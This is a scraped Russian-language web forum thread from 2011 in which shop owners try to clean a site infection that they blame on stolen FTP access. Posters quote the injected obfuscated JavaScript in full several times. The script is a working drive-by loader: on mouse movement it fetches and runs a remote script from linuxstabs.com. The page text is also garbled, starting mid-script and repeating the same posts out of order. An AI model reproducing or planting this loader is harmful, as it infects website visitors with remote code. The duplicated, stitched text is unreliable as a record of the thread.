_0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )(); </script> заменил на пробел ))) во всех файлах. Все, проблема ушла. Не помогло... Надіслати Поділитися на інших сайтах More sharing options... Sed Опубліковано: 2 липня 2011 Share Опубліковано: 2 липня 2011 Таким способом нашел лишь пять файлов index.html в разных папках. Антивирусом вообще ничего не нашел. Яндекс-вебмастер, например, указывает, что эта страница заражена. http://www.1catalog1.ru/index.php?route=product%2Fproduct&product_id=240 Скачал только ее, внимательно просмотрел код - ничего не нашел. Как можно еще попытаться решить проблему с заражением? Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 Sed, тему читайте полностью, а не последние сообщения. Надіслати Поділитися на інших сайтах More sharing options... Sed Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 Да все сделал как написано. Сменил пароль, просканил (почистил) комп, почистил файлы - не помогает... Надіслати Поділитися на інших сайтах More sharing options... Fix305 Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 значит не все файлы почистил Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... afwollis Опубліковано: 14 липня 2011 Share Опубліковано: 14 липня 2011 (змінено) ищу поциентов для комплексных обследований, вынесений диагнозов и разработки универсальной сыворотки. возможны побочные эффекты, такие, как: - впадение в кому; - временная инвалидность; - ... не исключена возможность летальных исходов... родина вас не забудет. = = = обращаться в ЛС только при наличии больного поциента. Змінено 14 липня 2011 користувачем afwollis Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Отчёты об ошибках [Решено] Дырка в коде?
monax Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 В 99% случаев это скомпрометированный доступ по FTP. У меня когда-то тоже подсел вирус на один из моих сайтов. Помню, кипишнул я тогда нипадецки. Первая мысль была - "дырка в коде". Но потом поспрашивал знающих людей и согласился, что, вероятнее всего, таки стырили доступ по ftp. Не факт, что с моего компа, т.к. достаточно трепетно отношусь к безопасности (антивирус, файрвол, антитроян и т.п. :rolleyes: ), но доступ был прописан в Дримвивере ещё на двух других компах. Оттуда, скорее всего, и стянули...Короче, с тех пор ftp вообще не пользуюсь. Даже заблокировал доступ по ftp на сервере. :lol: И пароли ни на каких других компах не оставляю. Надіслати Поділитися на інших сайтах More sharing options...
rabb1tkhv Опубліковано: 13 червня 2011 Share Опубліковано: 13 червня 2011 monax, в заголовке ведь четко написано - "боремся с вирусами". Ни о каких "дырках в скрипте" речи нет. Подробно разбирать проблему не стали, хотя известна дата заражения файлов. Пострадали как всегда индексные файлы, доступные для записи. Кроме них заражению подверглись header.*, footer.* и большая часть *.js. Гадость была почищена спец.скриптом, запущенным через cron. В результате "поломалась" библиотека jquery, которую быстро загрузили из чистого архива. Тоже эта гадость вылезла, причем на двух хостингах сразу (оба хостинга - разные, но у одного хостера)Если не сложно - поделитесь скриптом для Cron, а то вылавливать код в файлах запарился ((( Надіслати Поділитися на інших сайтах More sharing options...
Sed Опубліковано: 15 червня 2011 Share Опубліковано: 15 червня 2011 Доброго времени суток. Такая же проблема - сайт блокируется, как вредоносный. Причем в Опере блокируется, а в Мазиле нет, спокойно работает. Каковы пути решения проблемы? Скачать базу и перезалить скрипт? Надіслати Поділитися на інших сайтах More sharing options...
rabb1tkhv Опубліковано: 16 червня 2011 Share Опубліковано: 16 червня 2011 Доброго времени суток. Такая же проблема - сайт блокируется, как вредоносный. Причем в Опере блокируется, а в Мазиле нет, спокойно работает. Каковы пути решения проблемы? Скачать базу и перезалить скрипт?Проблему решил таким образом - скачал все файлы с хостинга, прогнал их касперычем (лечит большую часть файлов).Затем скачал программу http://www.infortech.ru/prj/open/tr/ Сделал автозамену текста <script type="text/javascript"> var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )(); </script> заменил на пробел ))) во всех файлах. Все, проблема ушла. Надіслати Поділитися на інших сайтах More sharing options...
supleader Опубліковано: 16 червня 2011 Share Опубліковано: 16 червня 2011 Как уже писали, это скомпрометирован доступ по FTP. Не пользуйтесь менеджерами, которые хранят пароли в открытом виде, а еще лучше использовать защищенный протокол. Надіслати Поділитися на інших сайтах More sharing options...
Sed Опубліковано: 1 липня 2011 Share Опубліковано: 1 липня 2011 Проблему решил таким образом - скачал все файлы с хостинга, прогнал их касперычем (лечит большую часть файлов). Затем скачал программу http://www.infortech.ru/prj/open/tr/ Сделал автозамену текста <script type="text/javascript"> var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )(); </script> заменил на пробел ))) во всех файлах. Все, проблема ушла. Не помогло... Надіслати Поділитися на інших сайтах More sharing options...
Sed Опубліковано: 2 липня 2011 Share Опубліковано: 2 липня 2011 Таким способом нашел лишь пять файлов index.html в разных папках. Антивирусом вообще ничего не нашел. Яндекс-вебмастер, например, указывает, что эта страница заражена. http://www.1catalog1.ru/index.php?route=product%2Fproduct&product_id=240 Скачал только ее, внимательно просмотрел код - ничего не нашел. Как можно еще попытаться решить проблему с заражением? Надіслати Поділитися на інших сайтах More sharing options...
afwollis Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 Sed, тему читайте полностью, а не последние сообщения. Надіслати Поділитися на інших сайтах More sharing options... Sed Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 Да все сделал как написано. Сменил пароль, просканил (почистил) комп, почистил файлы - не помогает... Надіслати Поділитися на інших сайтах More sharing options... Fix305 Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 значит не все файлы почистил Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... afwollis Опубліковано: 14 липня 2011 Share Опубліковано: 14 липня 2011 (змінено) ищу поциентов для комплексных обследований, вынесений диагнозов и разработки универсальной сыворотки. возможны побочные эффекты, такие, как: - впадение в кому; - временная инвалидность; - ... не исключена возможность летальных исходов... родина вас не забудет. = = = обращаться в ЛС только при наличии больного поциента. Змінено 14 липня 2011 користувачем afwollis Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку
Sed Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 Да все сделал как написано. Сменил пароль, просканил (почистил) комп, почистил файлы - не помогает... Надіслати Поділитися на інших сайтах More sharing options...
Fix305 Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 значит не все файлы почистил Надіслати Поділитися на інших сайтах More sharing options...
afwollis Опубліковано: 14 липня 2011 Share Опубліковано: 14 липня 2011 (змінено) ищу поциентов для комплексных обследований, вынесений диагнозов и разработки универсальной сыворотки. возможны побочные эффекты, такие, как: - впадение в кому; - временная инвалидность; - ... не исключена возможность летальных исходов... родина вас не забудет. = = = обращаться в ЛС только при наличии больного поциента. Змінено 14 липня 2011 користувачем afwollis Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0
Recommended Posts